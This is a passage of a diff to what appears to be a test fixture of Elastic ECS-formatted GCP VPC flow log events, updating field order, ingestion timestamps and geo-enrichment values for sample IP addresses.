"packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11295,6 +11890,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -11315,21 +11913,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391770800Z", - "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:20.842840991Z", - "end": "2019-06-14T03:42:20.952481728Z", - "id": "ptjoddfhmrhgj", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -11338,11 +11921,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 59790, @@ -11350,6 +11938,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415232756Z", + "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:50.590894439Z", + "end": "2019-06-14T03:40:50.702194466Z", + "id": "ptjoddfhmrhgr", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11361,17 +11959,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -11388,25 +11991,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 62 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391776400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:50.590894439Z", - "end": "2019-06-14T03:40:50.702194466Z", - "id": "ptjoddfhmrhgr", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -11415,13 +12003,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65317, @@ -11429,6 +12020,16 @@ "ip": "67.43.156.13", "packets": 728 }, + "event": { + "ingested": "2021-12-14T14:43:27.415233156Z", + "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.740491697Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "ptjoddfhmrhgn", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11440,19 +12041,30 @@ "iana_number": "6", "packets": 728, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 62 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -11463,38 +12075,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 62 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391781900Z", - "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.740491697Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "ptjoddfhmrhgn", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65317, @@ -11508,6 +12102,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415233555Z", + "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.740491697Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "ptjoddfhmrhga", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11519,46 +12123,6 @@ "iana_number": "6", "packets": 596, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:15.857Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 62 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391787400Z", - "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.740491697Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "ptjoddfhmrhga", - "category": "network", - "type": "connection" } }, { @@ -11573,11 +12137,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33692, @@ -11649,7 +12218,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391792200Z", + "ingested": "2021-12-14T14:43:27.415234007Z", "original": "{\"insertId\":\"ptjoddfhmrhgk\",\"jsonPayload\":{\"bytes_sent\":\"66094\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"360\",\"reporter\":\"DEST\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", @@ -11660,43 +12229,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65262, - "bytes": 4900, - "ip": "67.43.156.13", - "packets": 542 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", - "bytes": 4900, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 542, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11707,6 +12239,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -11724,8 +12259,33 @@ "reporter": "DEST" } }, + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65262, + "bytes": 4900, + "ip": "67.43.156.13", + "packets": 542 + }, "event": { - "ingested": "2021-12-09T13:37:46.391796700Z", + "ingested": "2021-12-14T14:43:27.415234413Z", "original": "{\"insertId\":\"ptjoddfhmrhgm\",\"jsonPayload\":{\"bytes_sent\":\"4900\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65262},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"542\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", @@ -11733,44 +12293,21 @@ "id": "ptjoddfhmrhgm", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 52328, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1781, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=", - "bytes": 1781, + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", + "bytes": 4900, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, + "packets": 542, + "direction": "inbound" + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11781,6 +12318,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -11801,8 +12341,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 52328, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1781, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391802200Z", + "ingested": "2021-12-14T14:43:27.415234805Z", "original": "{\"insertId\":\"ptjoddfhmrhgd\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52328,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:42:20.842840991Z", @@ -11810,6 +12375,18 @@ "id": "ptjoddfhmrhgd", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -11824,11 +12401,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33552, @@ -11900,7 +12482,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391807700Z", + "ingested": "2021-12-14T14:43:27.415235196Z", "original": "{\"insertId\":\"ptjoddfhmrhgl\",\"jsonPayload\":{\"bytes_sent\":\"63280\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", @@ -11911,43 +12493,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "Europe", - "country_name": "rou", - "city_name": "Bucharest", - "region_name": "Bucharest" - }, - "as": { - "number": 24940 - }, - "address": "67.43.156.14", - "port": 37292, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 774029, - "packets": 403, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", - "bytes": 774029, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 403, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -11958,6 +12503,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -11978,8 +12526,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 37292, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 774029, + "packets": 403, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.391812600Z", + "ingested": "2021-12-14T14:43:27.415235651Z", "original": "{\"insertId\":\"ptjoddfhmrhgi\",\"jsonPayload\":{\"bytes_sent\":\"774029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":37292,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"403\",\"reporter\":\"SRC\",\"rtt_msec\":\"102\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", @@ -11987,6 +12560,18 @@ "id": "ptjoddfhmrhgi", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", + "bytes": 774029, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 403, + "direction": "outbound" } }, { @@ -12001,11 +12586,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -12074,7 +12664,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391817Z", + "ingested": "2021-12-14T14:43:27.415236038Z", "original": "{\"insertId\":\"ptjoddfhmrhgo\",\"jsonPayload\":{\"bytes_sent\":\"359272\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-